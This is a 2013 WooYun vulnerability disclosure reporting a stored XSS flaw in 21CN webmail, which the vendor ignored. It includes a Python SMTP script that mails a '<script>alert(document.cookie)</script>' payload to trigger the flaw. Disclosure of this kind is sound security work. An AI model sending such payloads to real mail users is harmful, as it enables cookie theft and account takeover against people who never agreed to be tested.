当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032627

漏洞标题:21CN邮箱存储XSS漏洞(带有发送邮件poc程序)

相关厂商:世纪龙信息网络有限责任公司

漏洞作者: P@ssw0rd

提交时间:2013-07-29 19:16

修复时间:2013-08-03 19:17

公开时间:2013-08-03 19:17

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-29: 细节已通知厂商并且等待厂商处理中
2013-08-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

前几年各大邮箱都出现了XSS漏洞,这个漏洞对应邮箱用户来说基本上想对你做什么都行,XSS 蠕虫,自动发送邮件,修改个人信息等等,今天对一些国内的一些门户网站邮箱进行检测,还是不容乐观啊,估计大家都认为邮箱的XSS时代已经过去了,都没关注,今天来看看21CN邮箱的存储XSS漏洞,很严重的噢。

详细说明:

发送邮件的Python脚本。

#!/usr/bin/env python
#coding: utf-8
import smtplib
from email.mime.text import MIMEText
from email.header import Header
sender = '[email protected]'
receiver = '[email protected]'
subject = '您好,祝身体健康,工作顺利'
smtpserver = 'smtp.163.com'
username = 'tools_163_peter'
password = 'xxxxxxx'
msg = MIMEText("您好,祝身体健康,工作顺利<script>alert(document.cookie)</script>",'plain','utf-8')#中文需参数‘utf-8’,单字节字符不需要
msg['Subject'] = Header(subject, 'utf-8')
smtp = smtplib.SMTP()
smtp.connect('smtp.163.com')
smtp.login(username, password)
smtp.sendmail(sender, receiver, msg.as_string())
smtp.quit()

漏洞证明:

1. 用户收到恶意邮件

1.JPG


2. 当用户打开邮件,代码被执行

2.JPG

修复方案:

你们工程师更有经验。

版权声明:转载请注明来源 P@ssw0rd@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-08-03 19:17

厂商回复:

最新状态:

2013-08-05:已处理